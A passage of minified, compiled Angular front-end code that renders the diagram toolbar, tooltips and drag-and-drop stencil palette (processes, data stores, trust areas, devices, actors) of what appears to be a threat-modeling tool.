),g(1),ke(re(127,141,"pages.modeling.diagram.fs.textLarge")),g(9),F("checked",5==i.Dia.FontSizeConfigIndex),g(1),ke(re(137,143,"pages.modeling.diagram.fs.textLarger")),g(6),F("ngIf","HW"!=i.Dia.Diagram.DiagramType),g(2),F("ngIf","HW"!=i.Dia.Diagram.DiagramType),g(2),at("matTooltip",re(147,145,"pages.modeling.diagram.sendBack")),F("disabled",!i.Dia.IsObjectSelected),g(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected)),g(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),g(2),Rt("fill",i.theme.Color2),g(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),g(2),Rt("fill",i.theme.Color2),g(4),at("matTooltip",re(164,147,"pages.modeling.diagram.sendBackwards")),F("disabled",!i.Dia.IsObjectSelected),g(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected)),g(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),g(2),Rt("fill",i.theme.Color2),g(4),at("matTooltip",re(177,149,"pages.modeling.diagram.bringForward")),F("disabled",!i.Dia.IsObjectSelected),g(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),g(2),Rt("fill",i.theme.Color2),g(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),g(4),at("matTooltip",re(190,151,"pages.modeling.diagram.bringFront")),F("disabled",!i.Dia.IsObjectSelected),g(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),g(2),Rt("fill",i.theme.Color2),g(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),g(2),Rt("fill",i.theme.Color2),g(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),g(4),at("matTooltip",re(207,153,"pages.modeling.diagram.annotation")),F("disabled","pan"==i.Dia.MouseMode),g(8),at("matTooltip",re(215,155,"pages.modeling.diagram.findUninitObject")),F("disabled",0==i.Dia.ObjectCountToInit.length),g(3),F("matBadge",i.Dia.ObjectCountToInit)("matBadgeHidden",0==i.Dia.ObjectCountToInit.length),g(4),at("matTooltip",re(222,157,"pages.modeling.diagram.suggestedThreats")),F("disabled",i.IsContextDiagram||!i.selectedElement),g(7),at("matTooltip",re(229,159,"pages.modeling.diagram.addAttackScenario")),F("disabled",!i.selectedElement),g(7),at("matTooltip",re(236,161,"pages.modeling.diagram.CveSearch")),F("disabled",!i.selectedElement),g(6),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected)),g(2),Rt("fill",i.theme.IsDarkMode?"#000":"#FFF"),g(5),F("ngIf",i.dataService.Project.HasTesting),g(2),at("matTooltip",re(251,163,"pages.modeling.diagram.addCountermeasure")),F("disabled",!i.selectedElement),g(7),F("ngIf","HW"!=i.Dia.Diagram.DiagramType),g(2),at("matTooltip",re(260,165,"pages.modeling.diagram.ThreatGenerationSettings")),F("matMenuTriggerFor",c),g(12),F("ngModel",i.diagram.Settings.GenerationThreatLibrary),g(1),ct("\n ",re(273,167,"pages.modeling.diagram.ThreatLibrary"),"\n "),g(4),F("ngIf",i.HasMnemonics),g(2),F("disabled",!i.HasThreatRuleGroups)("matMenuTriggerFor",d),g(1),ke(re(280,169,"pages.modeling.diagram.ThreatRuleGroups")),g(5),F("ngModel",i.diagram.Settings.GenerationAssetBased),g(1),ct("\n ",re(286,171,"pages.modeling.diagram.AssetBasedGeneration"),"\n "),g(7),F("ngForOf",i.dataService.Config.GetStencilThreatMnemonics()),g(6),F("ngForOf",i.GetThreatRuleGroups()),g(5),F("value",i.Zoom),g(30),F("ngIf",!kr(175,_lt).includes(i.Zoom)),g(3),at("matTooltip",re(337,173,"pages.modeling.diagram.fitSceen")),g(14),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),F("matMenuTriggerFor",T)}},dependencies:[Zi,Ri,pm,_m,Ta,Ea,tH,OMe,oa,Hh,da,pp,Xo,qo,po,el,Pa,Mg,sV,cV,bP,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:100%}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.my-canvas[_ngcontent-%COMP%]{height:calc(100% - 32px)}",".heavy[_ngcontent-%COMP%] {\n font: bold 10px sans-serif;\n }"]}),t})();function Clt(t,a){1&t&&(bt(0),s(1,"\n "),m(2,"mat-expansion-panel",2),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"mat-panel-description"),s(11,"\n "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n "),u(),s(15,"\n "),u(),s(16),oe(17,"translate"),u(),s(18,"\n "),Mt()),2&t&&(g(7),ct("\n ",re(8,2,"general.Info"),"\n "),g(9),ct("\n \n ",re(17,4,"pages.modeling.stencilpalettte.cs.info"),"\n "))}function ylt(t,a){1&t&&(bt(0),s(1,"\n "),m(2,"mat-expansion-panel",2),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"mat-panel-description"),s(11,"\n "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n "),u(),s(15,"\n "),u(),s(16),oe(17,"translate"),u(),s(18,"\n "),Mt()),2&t&&(g(7),ct("\n ",re(8,2,"general.Info"),"\n "),g(9),ct("\n \n ",re(17,4,"pages.modeling.stencilpalettte.oi.info"),"\n "))}function blt(t,a){1&t&&(bt(0),s(1,"\n "),m(2,"mat-expansion-panel",2),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"mat-panel-description"),s(11,"\n "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n "),u(),s(15,"\n "),u(),s(16),oe(17,"translate"),u(),s(18,"\n "),Mt()),2&t&&(g(7),ct("\n ",re(8,2,"general.Info"),"\n "),g(9),ct("\n \n ",re(17,4,"pages.modeling.stencilpalettte.uc.infoNoReferences"),"\n "))}function Mlt(t,a){1&t&&(bt(0),s(1,"\n "),m(2,"mat-expansion-panel",2),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"mat-panel-description"),s(11,"\n "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n "),u(),s(15,"\n "),u(),s(16),oe(17,"translate"),u(),s(18,"\n "),Mt()),2&t&&(g(7),ct("\n ",re(8,2,"general.Info"),"\n "),g(9),ct("\n \n ",re(17,4,"pages.modeling.stencilpalettte.dt.info"),"\n "))}function vlt(t,a){1&t&&(bt(0),s(1,"\n "),m(2,"mat-expansion-panel",2),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"mat-panel-description"),s(11,"\n "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n "),u(),s(15,"\n "),u(),s(16),oe(17,"translate"),u(),s(18,"\n "),Mt()),2&t&&(g(7),ct("\n ",re(8,2,"general.Info"),"\n "),g(9),ct("\n \n ",re(17,4,"pages.modeling.stencilpalettte.a.info"),"\n "))}function Alt(t,a){1&t&&(bt(0),s(1,"\n "),m(2,"mat-expansion-panel",2),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"mat-panel-description"),s(11,"\n "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n "),u(),s(15,"\n "),u(),s(16),oe(17,"translate"),u(),s(18,"\n "),Mt()),2&t&&(g(7),ct("\n ",re(8,2,"general.Info"),"\n "),g(9),ct("\n \n ",re(17,4,"pages.modeling.stencilpalettte.swp.info"),"\n "))}function Tlt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(2).onDrag(n,c))})("dragend",function(){return be(e),Me(V(2).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit,i=V(2);at("matTooltip",i.GetStencilRefToolTip(e)),g(1),ri("border-color",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),g(1),ke(e.name)}}function Elt(t,a){if(1&t&&(fi(),m(0,"tspan",14),s(1),u()),2&t){const e=V().$implicit,i=V(2);ri("fill",i.StrokeColor),g(1),ke(i.WrapSVGText(null==e?null:e.name,1))}}function Dlt(t,a){if(1&t&&(fi(),m(0,"tspan",15),s(1),u()),2&t){const e=V().$implicit,i=V(2);ri("fill",i.StrokeColor),g(1),ke(i.WrapSVGText(null==e?null:e.name,2))}}function xlt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(2).onDrag(n,c))})("dragend",function(){return be(e),Me(V(2).onDragEnd())}),s(1,"\n "),fi(),m(2,"svg",8),s(3,"\n "),it(4,"path",9),s(5,"\n "),m(6,"text",10),s(7,"\n "),m(8,"tspan",11),s(9),u(),s(10,"\n "),ne(11,Elt,2,3,"tspan",12),s(12,"\n "),ne(13,Dlt,2,3,"tspan",13),s(14,"\n "),u(),s(15,"\n "),u(),s(16,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);at("matTooltip",i.GetStencilRefToolTip(e)),g(4),ri("stroke",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),g(4),ri("fill",i.StrokeColor),g(1),ke(i.WrapSVGText(null==e?null:e.name,0)),g(2),F("ngIf",i.WrapSVGText(null==e?null:e.name,1)),g(2),F("ngIf",i.WrapSVGText(null==e?null:e.name,2))}}function wlt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(3).onDrag(n,c))})("dragend",function(){return be(e),Me(V(3).onDragEnd())}),m(1,"div",16),s(2),u()()}if(2&t){const e=a.$implicit,i=V(3);at("matTooltip",i.GetStencilRefToolTip(e)),g(1),ri("border-color",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),g(1),ke(e.name)}}function Ilt(t,a){if(1&t&&(m(0,"mat-expansion-panel",2),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5,"\n External Entity\n "),u(),s(6,"\n "),m(7,"mat-panel-description"),s(8,"\n "),m(9,"mat-icon"),s(10,"cloud"),u(),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n\n "),m(14,"div",3),s(15,"\n "),ne(16,wlt,3,4,"div",4),s(17,"\n "),u(),s(18,"\n "),u()),2&t){const e=V(2);g(16),F("ngForOf",e.ExternalEntityStencils)}}function Rlt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(2).onDrag(n,c))})("dragend",function(){return be(e),Me(V(2).onDragEnd())}),m(1,"div",17),s(2),u()()}if(2&t){const e=a.$implicit,i=V(2);at("matTooltip",i.GetStencilRefToolTip(e)),g(1),ri("border-color",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),g(1),ke(e.name)}}function Slt(t,a){if(1&t&&(fi(),m(0,"tspan",14),s(1),u()),2&t){const e=V().$implicit,i=V(3);ri("fill",i.StrokeColor),g(1),ke(i.WrapSVGText(null==e?null:e.name,1))}}function klt(t,a){if(1&t&&(fi(),m(0,"tspan",15),s(1),u()),2&t){const e=V().$implicit,i=V(3);ri("fill",i.StrokeColor),g(1),ke(i.WrapSVGText(null==e?null:e.name,2))}}function Plt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(3).onDrag(n,c))})("dragend",function(){return be(e),Me(V(3).onDragEnd())}),s(1,"\n "),fi(),m(2,"svg",8),s(3,"\n "),it(4,"path",18),s(5,"\n "),m(6,"text",10),s(7,"\n "),m(8,"tspan",11),s(9),u(),s(10,"\n "),ne(11,Slt,2,3,"tspan",12),s(12,"\n "),ne(13,klt,2,3,"tspan",13),s(14,"\n "),u(),s(15,"\n "),u(),s(16,"\n "),u()}if(2&t){const e=a.$implicit,i=V(3);at("matTooltip",i.GetStencilRefToolTip(e)),g(4),ri("stroke",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),g(4),ri("fill",i.StrokeColor),g(1),ke(i.WrapSVGText(null==e?null:e.name,0)),g(2),F("ngIf",i.WrapSVGText(null==e?null:e.name,1)),g(2),F("ngIf",i.WrapSVGText(null==e?null:e.name,2))}}function Olt(t,a){if(1&t&&(m(0,"mat-expansion-panel",2),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5,"\n Interface\n "),u(),s(6,"\n "),m(7,"mat-panel-description"),s(8,"\n "),m(9,"mat-icon"),s(10,"sync_alt"),u(),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n\n "),s(14,"\n "),m(15,"div",3),s(16,"\n "),ne(17,Plt,17,8,"div",4),s(18,"\n "),u(),s(19,"\n "),u()),2&t){const e=V(2);g(17),F("ngForOf",e.InterfaceStencils)}}function Nlt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(3).onDrag(n,c))})("dragend",function(){return be(e),Me(V(3).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit,i=V(3);at("matTooltip",i.GetStencilRefToolTip(e)),g(1),ri("border-color",i.theme.Accent),g(1),ke(e.name)}}function Llt(t,a){if(1&t&&(m(0,"mat-expansion-panel",2),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5,"\n Interface\n "),u(),s(6,"\n "),m(7,"mat-panel-description"),s(8,"\n "),m(9,"mat-icon"),s(10,"sync_alt"),u(),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n\n "),m(14,"div",3),s(15,"\n "),ne(16,Nlt,3,4,"div",4),s(17,"\n "),u(),s(18,"\n "),u()),2&t){const e=V(2);g(16),F("ngForOf",e.InterfaceStencils)}}function zlt(t,a){if(1&t&&(fi(),m(0,"tspan",14),s(1),u()),2&t){const e=V().$implicit,i=V(2);ri("fill",i.StrokeColor),g(1),ke(i.WrapSVGText(null==e?null:e.name,1))}}function Wlt(t,a){if(1&t&&(fi(),m(0,"tspan",15),s(1),u()),2&t){const e=V().$implicit,i=V(2);ri("fill",i.StrokeColor),g(1),ke(i.WrapSVGText(null==e?null:e.name,2))}}function Flt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(2).onDrag(n,c))})("dragend",function(){return be(e),Me(V(2).onDragEnd())}),s(1,"\n "),fi(),m(2,"svg",8),s(3,"\n "),it(4,"path",19),s(5,"\n "),m(6,"text",10),s(7,"\n "),m(8,"tspan",11),s(9),u(),s(10,"\n "),ne(11,zlt,2,3,"tspan",12),s(12,"\n "),ne(13,Wlt,2,3,"tspan",13),s(14,"\n "),u(),s(15,"\n "),u(),s(16,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);at("matTooltip",i.GetStencilRefToolTip(e)),g(4),ri("stroke",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),g(4),ri("fill",i.StrokeColor),g(1),ke(i.WrapSVGText(null==e?null:e.name,0)),g(2),F("ngIf",i.WrapSVGText(null==e?null:e.name,1)),g(2),F("ngIf",i.WrapSVGText(null==e?null:e.name,2))}}function Vlt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(2).onDrag(n,c))})("dragend",function(){return be(e),Me(V(2).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit,i=V(2);at("matTooltip",i.GetStencilRefToolTip(e)),g(1),ri("border-color",i.theme.Accent),g(1),ke(e.name)}}function Blt(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"mat-expansion-panel",2),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7,"\n Process\n "),u(),s(8,"\n "),m(9,"mat-panel-description"),s(10,"\n "),m(11,"mat-icon"),s(12,"memory"),u(),s(13,"\n "),u(),s(14,"\n "),u(),s(15,"\n\n "),m(16,"div",3),s(17,"\n "),ne(18,Tlt,3,4,"div",4),s(19,"\n "),u(),s(20,"\n "),u(),s(21,"\n\n "),m(22,"mat-expansion-panel",2),s(23,"\n "),m(24,"mat-expansion-panel-header"),s(25,"\n "),m(26,"mat-panel-title"),s(27,"\n Data Store\n "),u(),s(28,"\n "),m(29,"mat-panel-description"),s(30,"\n "),m(31,"mat-icon"),s(32,"sd_card"),u(),s(33,"\n "),u(),s(34,"\n "),u(),s(35,"\n\n "),m(36,"div",3),s(37,"\n "),ne(38,xlt,17,8,"div",4),s(39,"\n "),u(),s(40,"\n "),u(),s(41,"\n\n "),ne(42,Ilt,19,1,"mat-expansion-panel",5),s(43,"\n "),s(44,"\n "),m(45,"mat-expansion-panel",2),s(46,"\n "),m(47,"mat-expansion-panel-header"),s(48,"\n "),m(49,"mat-panel-title"),s(50,"\n Trust Area\n "),u(),s(51,"\n "),m(52,"mat-panel-description"),s(53,"\n "),m(54,"mat-icon"),s(55,"select_all"),u(),s(56,"\n "),u(),s(57,"\n "),u(),s(58,"\n\n "),m(59,"div",3),s(60,"\n "),ne(61,Rlt,3,4,"div",4),s(62,"\n "),u(),s(63,"\n "),u(),s(64,"\n\n "),ne(65,Olt,20,1,"mat-expansion-panel",5),s(66,"\n "),ne(67,Llt,19,1,"mat-expansion-panel",5),s(68,"\n\n "),m(69,"mat-expansion-panel",2),s(70,"\n "),m(71,"mat-expansion-panel-header"),s(72,"\n "),m(73,"mat-panel-title"),s(74,"\n Physical Link\n "),u(),s(75,"\n "),m(76,"mat-panel-description"),s(77,"\n "),m(78,"mat-icon"),s(79,"precision_manufacturing"),u(),s(80,"\n "),u(),s(81,"\n "),u(),s(82,"\n\n "),s(83,"\n "),m(84,"div",3),s(85,"\n "),ne(86,Flt,17,8,"div",4),s(87,"\n "),u(),s(88,"\n "),u(),s(89,"\n\n "),m(90,"mat-expansion-panel",2),s(91,"\n "),m(92,"mat-expansion-panel-header"),s(93,"\n "),m(94,"mat-panel-title"),s(95,"\n Template\n "),u(),s(96,"\n "),m(97,"mat-panel-description"),s(98,"\n "),m(99,"mat-icon"),s(100,"view_module"),u(),s(101,"\n "),u(),s(102,"\n "),u(),s(103,"\n\n "),m(104,"div",3),s(105,"\n "),ne(106,Vlt,3,4,"div",4),s(107,"\n "),u(),s(108,"\n "),u(),s(109,"\n "),Mt()),2&t){const e=V();g(18),F("ngForOf",e.ProcessStencils),g(20),F("ngForOf",e.DataStoreStencils),g(4),F("ngIf","dataflow"==e.NodeType),g(19),F("ngForOf",e.TrustAreaStencils),g(4),F("ngIf","hardware"==e.NodeType),g(2),F("ngIf","dataflow"==e.NodeType),g(19),F("ngForOf",e.PhysicalLinkStencils),g(20),F("ngForOf",e.StencilTemplates)}}function Hlt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(2).onDragComponent(n,c))})("dragend",function(){return be(e),Me(V(2).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(2),ke(e.Name)}}function Ult(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-expansion-panel",2),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7,"\n Component\n "),u(),s(8,"\n "),m(9,"mat-panel-description"),s(10,"\n "),m(11,"mat-icon"),s(12,"code"),u(),s(13,"\n "),u(),s(14,"\n "),u(),s(15,"\n\n "),m(16,"div",3),s(17,"\n "),m(18,"div",20),he("dragstart",function(n){return be(e),Me(V().onDragComponent(n))})("dragend",function(){return be(e),Me(V().onDragEnd())}),m(19,"div",7),s(20,"New Component"),u()(),s(21,"\n "),ne(22,Hlt,3,2,"div",21),s(23,"\n "),u(),s(24,"\n\n "),u(),s(25,"\n "),Mt()}if(2&t){const e=V();g(22),F("ngForOf",e.ComponentTypes)}}function qlt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-expansion-panel",2),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7,"\n Device\n "),u(),s(8,"\n "),m(9,"mat-panel-description"),s(10,"\n "),m(11,"mat-icon"),s(12,"developer_board"),u(),s(13,"\n "),u(),s(14,"\n "),u(),s(15,"\n \n "),m(16,"div",3),s(17,"\n "),m(18,"div",20),he("dragstart",function(n){return be(e),Me(V().onDragContext(n,{name:"Device",type:"1"}))})("dragend",function(){return be(e),Me(V().onDragEnd())}),s(19,"\n "),m(20,"div",16),s(21,"Device"),u(),s(22,"\n "),u(),s(23,"\n "),m(24,"div",20),he("dragstart",function(n){return be(e),Me(V().onDragContext(n,{name:"Device",type:"2"}))})("dragend",function(){return be(e),Me(V().onDragEnd())}),s(25,"\n "),m(26,"div",16),s(27,"\n "),m(28,"div",22),s(29,"Device"),u(),s(30,"\n "),u(),s(31,"\n "),u(),s(32,"\n "),u(),s(33,"\n "),u(),s(34,"\n\n "),m(35,"mat-expansion-panel",2),s(36,"\n "),m(37,"mat-expansion-panel-header"),s(38,"\n "),m(39,"mat-panel-title"),s(40,"\n App\n "),u(),s(41,"\n "),m(42,"mat-panel-description"),s(43,"\n "),m(44,"mat-icon"),s(45,"widgets"),u(),s(46,"\n "),u(),s(47,"\n "),u(),s(48,"\n \n "),m(49,"div",3),s(50,"\n "),m(51,"div",20),he("dragstart",function(n){return be(e),Me(V().onDragContext(n,{name:"App",type:"1"}))})("dragend",function(){return be(e),Me(V().onDragEnd())}),s(52,"\n "),m(53,"div",16),s(54,"App"),u(),s(55,"\n "),u(),s(56,"\n "),m(57,"div",20),he("dragstart",function(n){return be(e),Me(V().onDragContext(n,{name:"App",type:"2"}))})("dragend",function(){return be(e),Me(V().onDragEnd())}),s(58,"\n "),m(59,"div",16),s(60,"\n "),m(61,"div",22),s(62,"App"),u(),s(63,"\n "),u(),s(64,"\n "),u(),s(65,"\n "),u(),s(66,"\n "),u(),s(67,"\n\n "),m(68,"mat-expansion-panel",2),s(69,"\n "),m(70,"mat-expansion-panel-header"),s(71,"\n "),m(72,"mat-panel-title"),s(73,"\n Actor\n "),u(),s(74,"\n "),m(75,"mat-panel-description"),s(76,"\n "),m(77,"mat-icon"),s(78,"people"),u(),s(79,"\n "),u(),s(80,"\n "),u(),s(81,"\n \n "),m(82,"div",3),s(83,"\n "),m(84,"div",20),he("dragstart",function(n){return be(e),Me(V().onDragContext(n,{name:"Interactor"}))})("dragend",function(){return be(e),Me(V().onDragEnd())}),s(85,"\n "),fi(),m(86,"svg",8),s(87,"\n "),it(88,"circle",23),s(89,"\n "),it(90,"path",24),s(91,"\n "),m(92,"text",10),s(93,"\n "),m(94,"tspan",25),s(95,"Actor"),u(),s(96,"\n "),u(),s(97,"\n "),u(),s(98,"\n "),u(),s(99,"\n "),u(),s(100,"\n "),u(),s(101,"\n\n "),ln(),m(102,"mat-expansion-panel",2),s(103,"\n "),m(104,"mat-expansion-panel-header"),s(105,"\n "),m(106,"mat-panel-title"),s(107,"\n Interface\n "),u(),s(108,"\n "),m(109,"mat-panel-description"),s(110,"\n "),m(111,"mat-icon"),s(112,"sync_alt"),u(),s(113,"\n "),u(),s(114,"\n "),u(),s(115,"\n \n "),m(116,"div",3),s(117,"\n "),m(118,"div",26),he("dragstart",function(n){return be(e),Me(V().onDragContext(n,{name:"Interface1"}))})("dragend",function(){return be(e),Me(V().onDragEnd())}),s(119,"\n "),m(120,"div"),s(121,"\n Interface\n "),u(),s(122,"\n "),m(123,"div",27),s(124,"\n "),u(),s(125,"\n "),u(),s(126,"\n "),s(127,"\n "),u(),s(128,"\n "),u(),s(129,"\n\n "),m(130,"mat-expansion-panel",2),s(131,"\n "),m(132,"mat-expansion-panel-header"),s(133,"\n "),m(134,"mat-panel-title"),s(135,"\n External Entity\n "),u(),s(136,"\n "),m(137,"mat-panel-description"),s(138,"\n "),m(139,"mat-icon"),s(140,"cloud"),u(),s(141,"\n "),u(),s(142,"\n "),u(),s(143,"\n\n "),m(144,"div",3),s(145,"\n "),m(146,"div",20),he("dragstart",function(n){return be(e),Me(V().onDragContext(n,{name:"External Entity"}))})("dragend",function(){return be(e),Me(V().onDragEnd())}),m(147,"div",16),s(148,"External Entity"),u()(),s(149,"\n "),u(),s(150,"\n "),u(),s(151,"\n "),m(152,"mat-expansion-panel",2),s(153,"\n "),m(154,"mat-expansion-panel-header"),s(155,"\n "),m(156,"mat-panel-title"),s(157,"\n Trust Area\n "),u(),s(158,"\n "),m(159,"mat-panel-description"),s(160,"\n "),m(161,"mat-icon"),s(162,"select_all"),u(),s(163,"\n "),u(),s(164,"\n "),u(),s(165,"\n\n "),m(166,"div",3),s(167,"\n "),m(168,"div",20),he("dragstart",function(n){return be(e),Me(V().onDragContext(n,{name:"Trust Area"}))})("dragend",function(){return be(e),Me(V().onDragEnd())}),m(169,"div",17),s(170,"Trust Area"),u()(),s(171,"\n "),u(),s(172,"\n "),u(),s(173,"\n "),Mt()}if(2&t){const e=V();g(20),ri("border-color",e.StrokeColor),g(6),ri("border-color",e.StrokeColor),g(2),ri("border-color",e.StrokeColor),g(25),ri("border-color",e.StrokeColor),g(6),ri("border-color",e.StrokeColor),g(2),ri("border-color",e.StrokeColor),g(27),ri("stroke",e.StrokeColor),g(2),ri("stroke",e.StrokeColor),g(4),ri("fill",e.StrokeColor),g(29),ri("border-color",e.StrokeColor),g(24),ri("border-color",e.StrokeColor),g(22),ri("border-color",e.StrokeColor)}}function Glt(t,a){if(1&t){const e=Ye();m(0,"div",31),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(2).onDragContext(n,c))})("dragend",function(){return be(e),Me(V(2).onDragEnd())}),s(1,"\n "),m(2,"div",16),s(3),u(),s(4,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);at("matTooltip",i.GetContextRefToolTip(e)),g(2),ri("border-color",i.theme.Primary),g(1),ke(e.name)}}function 